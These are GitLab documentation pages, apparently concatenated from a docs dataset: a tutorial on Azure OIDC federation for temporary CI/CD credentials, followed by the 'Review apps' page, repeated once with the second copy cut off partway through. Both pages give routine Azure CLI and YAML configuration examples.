--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Configure OpenID Connect in Azure to retrieve temporary credentials breadcrumbs: - doc - ci - cloud_services - azure --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} This tutorial demonstrates how to use a JSON web token (JWT) in a GitLab CI/CD job to retrieve temporary credentials from Azure without needing to store secrets. To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Azure. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md). Prerequisites: - Access to an existing Azure Subscription with `Owner` access level. - Access to the corresponding Azure Active Directory Tenant with at least the `Application Developer` access level. - A local installation of the [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli). Alternatively, you can use all the following steps with the [Azure Cloud Shell](https://portal.azure.com/#cloudshell/). - Your GitLab instance must be publicly accessible over the internet as Azure must to connect to the GitLab OIDC endpoint. - A GitLab project. To complete this tutorial: 1. [Create Azure AD application and service principal](#create-azure-ad-application-and-service-principal). 1. [Create Azure AD federated identity credentials](#create-azure-ad-federated-identity-credentials). 1. [Grant permissions for the service principal](#grant-permissions-for-the-service-principal). 1. [Retrieve a temporary credential](#retrieve-a-temporary-credential). For more information about Azure identity federation, see [workload identity federation](https://learn.microsoft.com/en-us/entra/workload-id/workload-identity-federation). ## Create Azure AD application and service principal To create an [Azure AD application](https://learn.microsoft.com/en-us/cli/azure/ad/app?view=azure-cli-latest#az-ad-app-create) and service principal: 1. In the Azure CLI, create the AD application: ```shell appId=$(az ad app create --display-name gitlab-oidc --query appId -otsv) ``` Save the `appId` (Application client ID) output, as you need it later to configure your GitLab CI/CD pipeline. 1. Create a corresponding [Service Principal](https://learn.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az-ad-sp-create): ```shell az ad sp create --id $appId --query appId -otsv ``` Instead of the Azure CLI, you can [use the Azure Portal to create these resources](https://learn.microsoft.com/en-us/entra/identity-platform/howto-create-service-principal-portal). ## Create Azure AD federated identity credentials To create the federated identity credentials for the previous Azure AD application for a specific branch in `<mygroup>/<myproject>`: ```shell objectId=$(az ad app show --id $appId --query id -otsv) cat <<EOF > body.json { "name": "gitlab-federated-identity", "issuer": "https://gitlab.example.com", "subject": "project_path:<mygroup>/<myproject>:ref_type:branch:ref:<branch>", "description": "GitLab service account federated identity", "audiences": [ "https://gitlab.example.com" ] } EOF az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json ``` For issues related to the values of `issuer`, `subject` or `audiences`, see the [troubleshooting](#troubleshooting) details. Optionally, you can now verify the Azure AD application and the Azure AD federated identity credentials from the Azure Portal: 1. Open the [Azure Active Directory App Registration](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/RegisteredApps) view and select the appropriate app registration by searching for the display name `gitlab-oidc`. 1. On the overview page you can verify details like the `Application (client) ID`, `Object ID`, and `Tenant ID`. 1. Under `Certificates & secrets`, go to `Federated credentials` to review your Azure AD federated identity credentials. ### Create credentials for any branch or any tag To create credentials for any branch or tag (wildcard matching), you can use [flexible federated identity credentials](https://learn.microsoft.com/entra/workload-id/workload-identities-flexible-federated-identity-credentials). For all branches in `<mygroup>/<myproject>`: ```shell objectId=$(az ad app show --id $appId --query id -otsv) cat <<EOF > body.json { "name": "gitlab-federated-identity", "issuer": "https://gitlab.example.com", "subject": null, "claimsMatchingExpression": { "value": "claims['sub'] matches 'project_path:<mygroup>/<myproject>:ref_type:branch:ref:*'", "languageVersion": 1 }, "description": "GitLab service account federated identity", "audiences": [ "https://gitlab.example.com" ] } EOF az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json ``` For all tags in `<mygroup>/<myproject>`: ```shell objectId=$(az ad app show --id $appId --query id -otsv) cat <<EOF > body.json { "name": "gitlab-federated-identity", "issuer": "https://gitlab.example.com", "subject": null, "claimsMatchingExpression": { "value": "claims['sub'] matches 'project_path:<mygroup>/<myproject>:ref_type:tag:ref:*'", "languageVersion": 1 }, "description": "GitLab service account federated identity", "audiences": [ "https://gitlab.example.com" ] } EOF az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json ``` ## Grant permissions for the service principal After you create the credentials, use [`role assignment`](https://learn.microsoft.com/en-us/cli/azure/role/assignment?view=azure-cli-latest#az-role-assignment-create) to grant permissions to the previous service principal so it gets access to the Azure resources: ```shell az role assignment create --assignee $appId --role Reader --scope /subscriptions/<subscription-id> ``` You can find your subscription ID in: - The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription). - The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription). The previous command grants read-only permissions to the entire subscription. For more information on applying the principle of least privilege in the context of your organization, read [Best practices for Azure AD roles](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices). ## Retrieve a temporary credential After you configure the Azure AD application and federated identity credentials, the CI/CD job can retrieve a temporary credential by using the [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login): ```yaml default: image: mcr.microsoft.com/azure-cli:latest variables: AZURE_CLIENT_ID: "<client-id>" AZURE_TENANT_ID: "<tenant-id>" auth: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.com script: - az login --service-principal -u $AZURE_CLIENT_ID -t $AZURE_TENANT_ID --federated-token $GITLAB_OIDC_TOKEN - az account show ``` The CI/CD variables are: - `AZURE_CLIENT_ID`: The [application client ID you saved earlier](#create-azure-ad-application-and-service-principal). - `AZURE_TENANT_ID`: Your Azure Active Directory. You can [find it by using the Azure CLI or Azure Portal](https://learn.microsoft.com/en-us/entra/fundamentals/how-to-find-tenant). - `GITLAB_OIDC_TOKEN`: An OIDC [ID token](../../yaml/_index.md#id_tokens). ## Troubleshooting ### "No matching federated identity record found" If you receive the error `ERROR: AADSTS70021: No matching federated identity record found for presented assertion.` you should verify: - The `Issuer` defined in the Azure AD federated identity credentials, for example `https://gitlab.com` or your own GitLab URL. - The `Subject identifier` defined in the Azure AD federated identity credentials, for example `project_path:<mygroup>/<myproject>:ref_type:branch:ref:<branch>`. - For the `gitlab-group/gitlab-project` project and `main` branch it would be: `project_path:gitlab-group/gitlab-project:ref_type:branch:ref:main`. - The correct values of `mygroup` and `myproject` can be retrieved by checking the URL when accessing your GitLab project or, in the upper-right corner of the project's overview page, selecting **Code**. - The `Audience` defined in the Azure AD federated identity credentials, for example `https://gitlab.com` or your own GitLab URL. You can review these settings, as well as your `AZURE_CLIENT_ID` and `AZURE_TENANT_ID` CI/CD variables, from the Azure Portal: 1. Open the [Azure Active Directory App Registration](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/RegisteredApps) view and select the appropriate app registration by searching for the display name `gitlab-oidc`. 1. On the overview page you can verify details like the `Application (client) ID`, `Object ID`, and `Tenant ID`. 1. Under `Certificates & secrets`, go to `Federated credentials` to review your Azure AD federated identity credentials. Review [Connect to cloud services](../_index.md) for further details. ### `Request to External OIDC endpoint failed` message If you receive the error `ERROR: AADSTS501661: Request to External OIDC endpoint failed.` you should verify that your GitLab instance is publicly accessible from the internet. Azure must be able to access the following GitLab endpoints to authenticate with OIDC: - `GET /.well-known/openid-configuration` - `GET /oauth/discovery/keys` If you update your firewall and still receive this error, [clear the Redis cache](../../../administration/raketasks/maintenance.md#clear-redis-cache) and try again. ### `No matching federated identity record found for presented assertion audience` message If you receive the error `ERROR: AADSTS700212: No matching federated identity record found for presented assertion audience 'https://gitlab.com'` you should verify that your CI/CD job uses the correct `aud` value. The `aud` value should match the audience used to [create the federated identity credentials](#create-azure-ad-federated-identity-credentials).
https://docs.gitlab.com/ci/review_apps
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/review_apps
[ "doc", "ci", "review_apps" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Review apps
Set up and use review apps to create temporary environments for testing changes before merging.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Review apps are temporary testing environments that are created automatically for each branch or merge request. You can preview and validate changes without needing to set up a local development environment. Built on [dynamic environments](../environments/_index.md#create-a-dynamic-environment), review apps provide a unique environment for each branch or merge request. ![Merged result pipeline status with link to the review app](img/review_apps_preview_in_mr_v16_0.png) These environments help streamline the development workflow by: - Eliminating the need for local setup to test changes. - Providing consistent environments for all team members. - Enabling stakeholders to preview changes with a URL. - Facilitating faster feedback cycles before changes reach production. {{< alert type="note" >}} If you have a Kubernetes cluster, you can set up review apps automatically using [Auto DevOps](../../topics/autodevops/_index.md). {{< /alert >}} ## Review app workflow A review app workflow could be similar to: ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% flowchart TD accTitle: Review app workflow accDescr: Diagram showing how review apps fit into the GitLab development workflow. subgraph Development["Development"] TopicBranch["Create topic branch"] Commit["Make code changes"] CreateMR["Create merge request"] end subgraph ReviewAppCycle["Review app cycle"] direction LR Pipeline["CI/CD pipeline runs"] ReviewApp["Review app deployed"] Testing["Review and testing"] Feedback["Feedback provided"] NewCommits["Address feedback with new commits"] end subgraph Deployment["Deployment"] Approval["Merge request approved"] Merge["Merged to default branch"] Production["Deployed to production"] end TopicBranch --> Commit Commit --> CreateMR CreateMR --> Pipeline Pipeline --> ReviewApp ReviewApp --> Testing Testing --> Feedback Feedback --> NewCommits NewCommits --> Pipeline Testing --> Approval Approval --> Merge Merge --> Production classDef devNode fill:#e1e1e1,stroke:#666,stroke-width:1px classDef reviewNode fill:#fff0dd,stroke:#f90,stroke-width:1px classDef finalNode fill:#d5f5ff,stroke:#0095cd,stroke-width:1px class TopicBranch,Commit,CreateMR devNode class Pipeline,ReviewApp,Testing,Feedback,NewCommits reviewNode class Approval,Merge,Production finalNode ``` ## Configure review apps Configure review apps when you want to provide a preview environment of your application for each branch or merge request. Prerequisites: - You must have at least the Developer role for the project. - You must have CI/CD pipelines available in the project. - You must set up the infrastructure to host and deploy the review apps. To configure review apps in your project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Pipeline editor**. 1. In your `.gitlab-ci.yml` file, add a job that creates a [dynamic environment](../environments/_index.md#create-a-dynamic-environment). You can use a [predefined CI/CD variable](../variables/predefined_variables.md) to differentiate each environment. For example, using the `CI_COMMIT_REF_SLUG` predefined variable: ```yaml review_app: stage: deploy script: - echo "Deploy to review app environment" # Add your deployment commands here environment: name: review/$CI_COMMIT_REF_SLUG url: https://$CI_COMMIT_REF_SLUG.example.com rules: - if: $CI_COMMIT_BRANCH && $CI_COMMIT_BRANCH != $CI_DEFAULT_BRANCH ``` 1. Optional. Add `when: manual` to the job to only deploy review apps manually. 1. Optional. Add a job to [stop the review app](#stop-review-apps) when it's no longer needed. 1. Enter a commit message and select **Commit changes**. ### Use the review apps template GitLab provides a built-in template that's configured for merge request pipelines by default. To use and customize this template: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Environments**. 1. Select **Enable review apps**. 1. From the **Enable Review Apps** dialog that appears, copy the YAML template: ```yaml deploy_review: stage: deploy script: - echo "Add script here that deploys the code to your infrastructure" environment: name: review/$CI_COMMIT_REF_NAME url: https://$CI_ENVIRONMENT_SLUG.example.com rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" ``` 1. Select **Build > Pipeline editor**. 1. Paste the template into your `.gitlab-ci.yml` file. 1. Customize the template based on your deployment needs: - Modify the deployment script and environment URL to work with your infrastructure. - Adjust [the rules section](../jobs/job_rules.md) if you want to trigger review apps for branches even without merge requests. For example, for a deployment to Heroku: ```yaml deploy_review: stage: deploy image: ruby:latest script: - apt-get update -qy - apt-get install -y ruby-dev - gem install dpl - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_API_KEY environment: name: review/$CI_COMMIT_REF_NAME url: https://$HEROKU_APP_NAME.herokuapp.com on_stop: stop_review_app rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" ``` This configuration sets up an automated deployment to Heroku whenever a pipeline runs for a merge request. It uses Ruby's `dpl` deployment tool to handle the process, and creates a dynamic review environment that can be accessed through the specified URL. 1. Enter a commit message and select **Commit changes**. ### Stop review apps You can configure your review apps to be stopped either manually or automatically to conserve resources. For more information about stopping environments for review apps, see [Stopping an environment](../environments/_index.md#stopping-an-environment). #### Auto-stop review apps on merge To configure review apps to automatically stop when the associated merge request is merged or the branch is deleted: 1. Add the [`on_stop`](../yaml/_index.md#environmenton_stop) keyword to your deployment job. 1. Create a stop job with the [`environment:action: stop`](../yaml/_index.md#environmentaction). 1. Optional. Add [`when: manual`](../yaml/_index.md#when) to the stop job to make it possible to manually stop the review app at any time. For example: ```yaml # In your .gitlab-ci.yml file deploy_review: # Other configuration... environment: name: review/${CI_COMMIT_REF_NAME} url: https://${CI_ENVIRONMENT_SLUG}.example.com on_stop: stop_review_app # References the stop_review_app job stop_review_app: stage: deploy script: - echo "Stop review app" # Add your cleanup commands here environment: name: review/${CI_COMMIT_REF_NAME} action: stop when: manual # Makes this job manually triggerable rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" ``` #### Time-based automatic stop To configure review apps to stop automatically after a period of time, add the [`auto_stop_in`](../yaml/_index.md#environmentauto_stop_in) keyword to your deployment job: ```yaml # In your .gitlab-ci.yml file review_app: script: deploy-review-app environment: name: review/$CI_COMMIT_REF_SLUG auto_stop_in: 1 week # Stops after one week of inactivity rules: - if: $CI_MERGE_REQUEST_ID ``` ## View review apps To deploy and access review apps: 1. Go to your merge request. 1. Optional. If the review app job is manual, select **Run** ({{< icon name="play" >}}) to trigger the deployment. 1. When the pipeline finishes, select **View app** to open the review app in your browser. ## Example implementations These projects demonstrate different review app implementations: | Project | Configuration file | | --------------------------------------------------------------------------------------- | ------------------ | | [NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-nginx/-/blob/b9c1f6a8a7a0dfd9c8784cbf233c0a7b6a28ff27/.gitlab-ci.yml#L20) | | [OpenShift](https://gitlab.com/gitlab-examples/review-apps-openshift) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-openshift/-/blob/82ebd572334793deef2d5ddc379f38942f3488be/.gitlab-ci.yml#L42) | | [HashiCorp Nomad](https://gitlab.com/gitlab-examples/review-apps-nomad) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-nomad/-/blob/ca372c778be7aaed5e82d3be24e98c3f10a465af/.gitlab-ci.yml#L110) | | [GitLab Documentation](https://gitlab.com/gitlab-org/technical-writing/docs-gitlab-com) | [`build.gitlab-ci.yml`](https://gitlab.com/gitlab-org/technical-writing/docs-gitlab-com/-/blob/bdbf11814428a06e82d7b712c72b5cb53c750f29/.gitlab/ci/build.gitlab-ci.yml#L73-76) | | [`https://about.gitlab.com/`](https://gitlab.com/gitlab-com/www-gitlab-com/) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-com/www-gitlab-com/-/blob/6ffcdc3cb9af2abed490cbe5b7417df3e83cd76c/.gitlab-ci.yml#L332) | | [GitLab Insights](https://gitlab.com/gitlab-org/gitlab-insights/) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab-insights/-/blob/9e63f44ac2a5a4defc965d0d61d411a768e20546/.gitlab-ci.yml#L234) | Other examples of review apps: - <i class="fa-youtube-play" aria-hidden="true"></i> [Cloud Native Development with GitLab](https://www.youtube.com/watch?v=jfIyQEwrocw). - [Review apps for Android](https://about.gitlab.com/blog/2020/05/06/how-to-create-review-apps-for-android-with-gitlab-fastlane-and-appetize-dot-io/). ## Route maps Route maps let you navigate directly from source files to their corresponding public pages in the review app environment. This feature makes it easier to preview specific changes in your merge requests. When configured, route maps add contextual links that let you view the review app version of files that match your mapping patterns. These links appear in: - The merge request widget. - Commit and file views. ### Configure route maps To set up route maps: 1. Create a file in your repository at `.gitlab/route-map.yml`. 1. Define mappings between source paths (in your repository) and public paths (on your review app infrastructure or website). The route map is a YAML array where each entry maps a `source` path to a `public` path. Each mapping in the route map follows this format: ```yaml - source: 'path/to/source/file' # Source file in repository public: 'path/to/public/page' # Public page on the website ``` You can use two types of mapping: - Exact match: String literals enclosed in single quotes - Pattern match: Regular expressions enclosed in forward slashes For pattern matching with regular expressions: - The regex must match the entire source path (`^` and `$` anchors are implied). - You can use capture groups `()` that can be referenced in the `public` path. - Reference capture groups using `\N` expressions in order of occurrence (`\1`, `\2`, etc.). - Escape slashes (`/`) as `\/` and periods (`.`) as `\.`. GitLab evaluates mappings in order of definition. The first `source` expression that matches determines the `public` path. ### Example route map The following example shows a route map for [Middleman](https://middlemanapp.com), a static site generator used for the [GitLab website](https://about.gitlab.com): ```yaml # Team data - source: 'data/team.yml' # data/team.yml public: 'team/' # team/ # Blogposts - source: /source\/posts\/([0-9]{4})-([0-9]{2})-([0-9]{2})-(.+?)\..*/ # source/posts/2017-01-30-around-the-world-in-6-releases.html.md.erb public: '\1/\2/\3/\4/' # 2017/01/30/around-the-world-in-6-releases/ # HTML files - source: /source\/(.+?\.html).*/ # source/index.html.haml public: '\1' # index.html # Other files - source: /source\/(.*)/ # source/images/blogimages/around-the-world-in-6-releases-cover.png public: '\1' # images/blogimages/around-the-world-in-6-releases-cover.png ``` In this example: - The mappings are evaluated in order. - The third mapping ensures that `source/index.html.haml` matches `/source\/(.+?\.html).*/` instead of the catch-all `/source\/(.*)/`. This produces a public path of `index.html` instead of `index.html.haml`. ### View mapped pages Use route maps to navigate directly from source files to their corresponding pages in your review app. Prerequisites: - You must have configured route maps in `.gitlab/route-map.yml`. - A review app must be deployed for your branch or merge request. To view mapped pages from the merge request widget: 1. In the merge request widget, select **View app**. The dropdown list shows up to 5 mapped pages (with filtering if more are available). ![Merge request widget with route maps showing matched items and filter bar.](img/mr_widget_route_maps_v17_11.png) To view a mapped page from a file: 1. Go to a file that matches your route map using one of these methods: - From a merge request: In the **Changes** tab, select **View file @ [commit]**. - From a commit page: Select the filename. - From a comparison: When comparing revisions, select the filename. 1. On the file's page, select **View on [environment-name]** ({{< icon name="external-link" >}}) in the upper-right corner. To view mapped pages from a commit: 1. Go to a commit that has a review app deployment: - For branch pipelines: Select **Code > Commits** and select a commit with a pipeline badge. - For merge request pipelines: In your merge request, select the **Commits** tab and select a commit. - For merged results pipelines: In your merge request, select the **Pipelines** tab and select the pipeline commit. 1. Select the review app icon ({{< icon name="external-link" >}}) next to a filename that matches your route map. The icon opens the corresponding page in your review app. {{< alert type="note" >}} Merged results pipelines create an internal commit that merges your branch with the target branch. To access review app links for these pipelines, use the commit from the **Pipelines** tab, not the **Commits** tab. {{< /alert >}}
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Set up and use review apps to create temporary environments for testing changes before merging. title: Review apps breadcrumbs: - doc - ci - review_apps --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Review apps are temporary testing environments that are created automatically for each branch or merge request. You can preview and validate changes without needing to set up a local development environment. Built on [dynamic environments](../environments/_index.md#create-a-dynamic-environment), review apps provide a unique environment for each branch or merge request. ![Merged result pipeline status with link to the review app](img/review_apps_preview_in_mr_v16_0.png) These environments help streamline the development workflow by: - Eliminating the need for local setup to test changes. - Providing consistent environments for all team members. - Enabling stakeholders to preview changes with a URL. - Facilitating faster feedback cycles before changes reach production. {{< alert type="note" >}} If you have a Kubernetes cluster, you can set up review apps automatically using [Auto DevOps](../../topics/autodevops/_index.md). {{< /alert >}} ## Review app workflow A review app workflow could be similar to: ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% flowchart TD accTitle: Review app workflow accDescr: Diagram showing how review apps fit into the GitLab development workflow. subgraph Development["Development"] TopicBranch["Create topic branch"] Commit["Make code changes"] CreateMR["Create merge request"] end subgraph ReviewAppCycle["Review app cycle"] direction LR Pipeline["CI/CD pipeline runs"] ReviewApp["Review app deployed"] Testing["Review and testing"] Feedback["Feedback provided"] NewCommits["Address feedback with new commits"] end subgraph Deployment["Deployment"] Approval["Merge request approved"] Merge["Merged to default branch"] Production["Deployed to production"] end TopicBranch --> Commit Commit --> CreateMR CreateMR --> Pipeline Pipeline --> ReviewApp ReviewApp --> Testing Testing --> Feedback Feedback --> NewCommits NewCommits --> Pipeline Testing --> Approval Approval --> Merge Merge --> Production classDef devNode fill:#e1e1e1,stroke:#666,stroke-width:1px classDef reviewNode fill:#fff0dd,stroke:#f90,stroke-width:1px classDef finalNode fill:#d5f5ff,stroke:#0095cd,stroke-width:1px class TopicBranch,Commit,CreateMR devNode class Pipeline,ReviewApp,Testing,Feedback,NewCommits reviewNode class Approval,Merge,Production finalNode ``` ## Configure review apps Configure review apps when you want to provide a preview environment of your application for each branch or merge request. Prerequisites: - You must have at least the Developer role for the project. - You must have CI/CD pipelines available in the project. - You must set up the infrastructure to host and deploy the review apps. To configure review apps in your project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Pipeline editor**. 1. In your `.gitlab-ci.yml` file, add a job that creates a [dynamic environment](../environments/_index.md#create-a-dynamic-environment). You can use a [predefined CI/CD variable](../variables/predefined_variables.md) to differentiate each environment. For example, using the `CI_COMMIT_REF_SLUG` predefined variable: ```yaml review_app: stage: deploy script: - echo "Deploy to review app environment" # Add your deployment commands here environment: name: review/$CI_COMMIT_REF_SLUG url: https://$CI_COMMIT_REF_SLUG.example.com rules: - if: $CI_COMMIT_BRANCH && $CI_COMMIT_BRANCH != $CI_DEFAULT_BRANCH ``` 1. Optional. Add `when: manual` to the job to only deploy review apps manually. 1. Optional. Add a job to [stop the review app](#stop-review-apps) when it's no longer needed. 1. Enter a commit message and select **Commit changes**. ### Use the review apps template GitLab provides a built-in template that's configured for merge request pipelines by default. To use and customize this template: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Environments**. 1. Select **Enable review apps**. 1. From the **Enable Review Apps** dialog that appears, copy the YAML template: ```yaml deploy_review: stage: deploy script: - echo "Add script here that deploys the code to your infrastructure" environment: name: review/$CI_COMMIT_REF_NAME url: https://$CI_ENVIRONMENT_SLUG.example.com rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" ``` 1. Select **Build > Pipeline editor**. 1. Paste the template into your `.gitlab-ci.yml` file. 1. Customize the template based on your deployment needs: - Modify the deployment script and environment URL to work with your infrastructure. - Adjust [the rules section](../jobs/job_rules.md) if you want to trigger review apps for branches even without merge requests. For example, for a deployment to Heroku: ```yaml deploy_review: stage: deploy image: ruby:latest script: - apt-get update -qy - apt-get install -y ruby-dev - gem install dpl - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_API_KEY environment: name: review/$CI_COMMIT_REF_NAME url: https://$HEROKU_APP_NAME.herokuapp.com on_stop: stop_review_app rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" ``` This configuration sets up an automated deployment to Heroku whenever a pipeline runs for a merge request. It uses Ruby's `dpl` deployment tool to handle the process, and creates a dynamic review environment that can be accessed through the specified URL. 1. Enter a commit message and select **Commit changes**. ### Stop review apps You can configure your review apps to be stopped either manually or automatically to conserve resources. For more information about stopping environments for review apps, see [Stopping an environment](../environments/_index.md#stopping-an-environment). #### Auto-stop review apps on merge To configure review apps to automatically stop when the associated merge request is merged or the branch is deleted: 1. Add the [`on_stop`](../yaml/_index.md#environmenton_stop) keyword to your deployment job. 1. Create a stop job with the [`environment:action: stop`](../yaml/_index.md#environmentaction). 1. Optional. Add [`when: manual`](../yaml/_index.md#when) to the stop job to make it possible to manually stop the review app at any time. For example: ```yaml # In your .gitlab-ci.yml file deploy_review: # Other configuration... environment: name: review/${CI_COMMIT_REF_NAME} url: https://${CI_ENVIRONMENT_SLUG}.example.com on_stop: stop_review_app # References the stop_review_app job stop_review_app: stage: deploy script: - echo "Stop review app" # Add your cleanup commands here environment: name: review/${CI_COMMIT_REF_NAME} action: stop when: manual # Makes this job manually triggerable rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" ``` #### Time-based automatic stop To configure review apps to stop automatically after a period of time, add the [`auto_stop_in`](../yaml/_index.md#environmentauto_stop_in) keyword to your deployment job: ```yaml # In your .gitlab-ci.yml file review_app: script: deploy-review-app environment: name: review/$CI_COMMIT_REF_SLUG auto_stop_in: 1 week # Stops after one week of inactivity rules: - if: $CI_MERGE_REQUEST_ID ``` ## View review apps To deploy and access review apps: 1. Go to your merge request. 1. Optional. If the review app job is manual, select **Run** ({{< icon name="play" >}}) to trigger the deployment. 1. When the pipeline finishes, select **View app** to open the review app in your browser. ## Example implementations These projects demonstrate different review app implementations: | Project | Configuration file | | --------------------------------------------------------------------------------------- | ------------------ | | [NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-nginx/-/blob/b9c1f6a8a7a0dfd9c8784cbf233c0a7b6a28ff27/.gitlab-ci.yml#L20) | | [OpenShift](https://gitlab.com/gitlab-examples/review-apps-openshift) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-openshift/-/blob/82ebd572334793deef2d5ddc379f38942f3488be/.gitlab-ci.yml#L42) | | [HashiCorp Nomad](https://gitlab.com/gitlab-examples/review-apps-nomad) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-nomad/-/blob/ca372c778be7aaed5e82d3be24e98c3f10a465af/.gitlab-ci.yml#L110) | | [GitLab Documentation](https://gitlab.com/gitlab-org/technical-writing/docs-gitlab-com) | [`build.gitlab-ci.yml`](https://gitlab.com/gitlab-org/technical-writing/docs-gitlab-com/-/blob/bdbf11814428a06e82d7b712c72b5cb53c750f29/.gitlab/ci/build.gitlab-ci.yml#L73-76) | | [`https://about.gitlab.com/`](https://gitlab.com/gitlab-com/www-gitlab-com/) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-com/www-gitlab-com/-/blob/6ffcdc3cb9af2abed490cbe5b7417df3e83cd76c/.gitlab-ci.yml#L332) | | [GitLab Insights](https://gitlab.com/gitlab-org/gitlab-insights/) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab-insights/-/blob/9e63f44ac2a5a4defc965d0d61d411a768e20546/.gitlab-ci.yml#L234) | Other examples of review apps: - <i class="fa-youtube-play" aria-hidden="true"></i> [Cloud Native Development with GitLab](https://www.youtube.com/watch?v=jfIyQEwrocw). - [Review apps for Android](https://about.gitlab.com/blog/2020/05/06/how-to-create-review-apps-for-android-with-gitlab-fastlane-and-appetize-dot-io/). ## Route maps Route maps let you navigate directly from source files to their corresponding public pages in the review app environment. This feature makes it easier to preview specific changes in your merge requests. When configured, route maps add contextual links that let you view the review app version of files that match your mapping patterns. These links appear in: - The merge request widget. - Commit and file views. ### Configure route maps To set up route maps: 1. Create a file in your repository at `.gitlab/route-map.yml`. 1. Define mappings between source paths (in your repository) and public paths (on your review app infrastructure or website). The route map is a YAML array where each entry maps a `source` path to a `public` path. Each mapping in the route map follows this format: ```yaml - source: 'path/to/source/file' # Source file in repository public: 'path/to/public/page' # Public page on the website ``` You can use two types of mapping: - Exact match: String literals enclosed in single quotes - Pattern match: Regular expressions enclosed in forward slashes For pattern matching with regular expressions: - The regex must match the entire source path (`^` and `$` anchors are implied). - You can use capture groups `()` that can be referenced in the `public` path. - Reference capture groups using `\N` expressions in order of occurrence (`\1`, `\2`, etc.). - Escape slashes (`/`) as `\/` and periods (`.`) as `\.`. GitLab evaluates mappings in order of definition. The first `source` expression that matches determines the `public` path. ### Example route map The following example shows a route map for [Middleman](https://middlemanapp.com), a static site generator used for the [GitLab website](https://about.gitlab.com): ```yaml # Team data - source: 'data/team.yml' # data/team.yml public: 'team/' # team/ # Blogposts - source: /source\/posts\/([0-9]{4})-([0-9]{2})-([0-9]{2})-(.+?)\..*/ # source/posts/2017-01-30-around-the-world-in-6-releases.html.md.erb public: '\1/\2/\3/\4/' # 2017/01/30/around-the-world-in-6-releases/ # HTML files - source: /source\/(.+?\.html).*/ # source/index.html.haml public: '\1' # index.html # Other files - source: /source\/(.*)/ # source/images/blogimages/around-the-world-in-6-releases-cover.png public: '\1' # images/blogimages/around-the-world-in-6-releases-cover.png ``` In this example: - The mappings are evaluated in order. - The third mapping ensures that `source/index.html.haml` matches `/source\/(.+?\.html).*/` instead of the catch-all `/source\/(.*)/`. This produces a public path of `index.html` instead of `index.html.haml`. ### View mapped pages Use route maps to navigate directly from source files to their corresponding pages in your review app. Prerequisites: - You must have configured route maps in `.gitlab/route-map.yml`. - A review app must be deployed for your branch or merge request. To view mapped pages from the merge request widget: 1. In the merge request widget, select **View app**. The dropdown list shows up to 5 mapped pages (with filtering if more are available). ![Merge request widget with route maps showing matched items and filter bar.](img/mr_widget_route_maps_v17_11.png) To view a mapped page from a file: 1. Go to a file that matches your route map using one of these methods: - From a merge request: In the **Changes** tab, select **View file @ [commit]**. - From a commit page: Select the filename. - From a comparison: When comparing 